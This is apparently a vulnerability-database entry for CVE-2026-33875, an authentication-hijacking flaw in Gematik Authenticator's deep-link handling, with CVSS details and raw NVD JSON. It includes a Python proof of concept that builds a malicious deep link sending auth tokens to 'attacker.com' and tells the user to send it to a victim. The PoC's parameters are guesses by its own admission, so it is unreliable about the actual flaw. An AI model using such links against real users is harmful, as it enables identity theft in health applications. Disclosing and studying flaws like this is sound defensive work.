Security Vulnerability Report
CVE-2026-33875 CVSS 9.3 CRITICAL

CVE-2026-33875

Published: 2026-03-27 21:17:24
Last Modified: 2026-04-03 16:16:40

Description

Gematik Authenticator securely authenticates users for login to digital health applications. Versions prior to 4.16.0 are vulnerable to authentication flow hijacking, potentially allowing attackers to authenticate with the identities of victim users who click on a malicious deep link. Update Gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds.

CVSS Details

CVSS Score: 9.3
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:* - VULNERABLE
Gematik Authenticator < 4.16.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-33875
# This script demonstrates how to generate a malicious deep link
# that could potentially trigger the authentication hijacking.
# Note: Actual exploitation depends on the specific scheme logic.

import urllib.parse


def generate_malicious_link(attacker_server):
    # Simulating the deep link scheme used by Gematik Authenticator
    # The vulnerable logic likely trusts the callback URL or state token
    base_scheme = "gematik-auth://login"

    # Construct parameters that might hijack the session or redirect auth code
    # In a real scenario, this would involve specific parameters like 'state' or 'redirect_uri'
    payload = {
        "redirect_uri": f"{attacker_server}/capture_token",
        "state": "hijacked_session_id",
        "client_id": "malicious_client",
    }
    malicious_url = f"{base_scheme}?{urllib.parse.urlencode(payload)}"
    return malicious_url


if __name__ == "__main__":
    # Attacker controlled server to receive the authentication token
    evil_server = "https://attacker.com"
    link = generate_malicious_link(evil_server)
    print(f"[+] Malicious Deep Link Generated:\n{link}")
    print("[+] Send this link to the victim and wait for interaction.")

References

https://github.com/gematik/app-Authenticator/security/advisories/GHSA-qg87-cf56-2rmr (Vendor Advisory)
https://www.machinespirits.com/advisory/f41e56/

Weakness: CWE-940
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33875", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:24.377", "lastModified": "2026-04-03T16:16:40.093", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gematik Authenticator securely authenticates users for login to digital health applications. Versions prior to 4.16.0 are vulnerable to authentication flow hijacking, potentially allowing attackers to authenticate with the identities of victim users who click on a malicious deep link. Update Gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-940"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.16.0", "matchCriteriaId": "B6F3F2CC-8AAB-467C-A2CB-D8D994FB4195"}]}]}], "references": [{"url": "https://github.com/gematik/app-Authenticator/security/advisories/GHSA-qg87-cf56-2rmr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.machinespirits.com/advisory/f41e56/", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}